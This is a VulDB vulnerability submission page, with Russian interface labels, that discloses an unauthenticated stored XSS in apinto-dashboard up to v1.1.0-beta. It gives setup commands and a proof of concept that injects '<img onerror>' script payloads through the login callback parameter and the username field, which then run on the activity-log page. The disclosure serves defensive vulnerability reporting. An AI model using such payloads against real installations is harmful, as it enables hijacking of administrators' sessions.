Отправить #50338: Unauthenticated Stored XSS in apinto-dashboard <= v1.1.0-beta via callback, usernameИнформация

НазваниеUnauthenticated Stored XSS in apinto-dashboard <= v1.1.0-beta via callback, username
Описание# Get start repo: https://github.com/eolinker/apinto-dashboard 1,Download and unzip the installation package Apinto 2,Start gateway 3,Download and unzip the installation package Apinto Dashboard 4,Start Apinto Dashboard ```bash wget https://github.com/eolinker/apinto/releases/download/v0.8.0/apinto-v0.8.0.linux.x64.tar.gz && tar -zxvf apinto-v0.8.0.linux.x64.tar.gz && cd apinto ./apinto start cd .. wget https://github.com/eolinker/apinto-dashboard/releases/download/v1.1.0-beta/apinto-dashboard-v1.1.0-beta.linux.x64.tar.gz && tar -zxvf apinto-dashboard-v1.1.0-beta.linux.x64.tar.gz && cd apinto-dashboard ./apinto-dashboard ``` # Unauthenticated Stored XSS While user loging, the wrong user name and callback parameter will be recorded in the activity log, but the output parameters are not escaped correctly, external attacker can inject arbitrary js code. poc: open /login?callback=/<img src=1 onerror=alert(/2nd-xss/)> enter `<img src=1 onerror=alert(/1st-xss/)>` at the username ![](https://c2.im5i.com/2022/11/01/XrTL4.png) ![](https://c2.im5i.com/2022/11/01/XrXvW.png) then open /activity-log ![](https://c2.im5i.com/2022/11/01/Xrjjd.png) ![](https://c2.im5i.com/2022/11/01/XrHKR.png)
Пользователь
 Tomy (UID 34751)
Представление01.11.2022 11:54 (4 лет назад)
Модерация01.11.2022 16:50 (5 hours later)
Статуспринято
Запись VulDB212640 [eolinker apinto-dashboard /login callback межсайтовый скриптинг]
Баллы17

ПредыдущийОбзорДалее

Interested in the pricing of exploits?

See the underground prices here!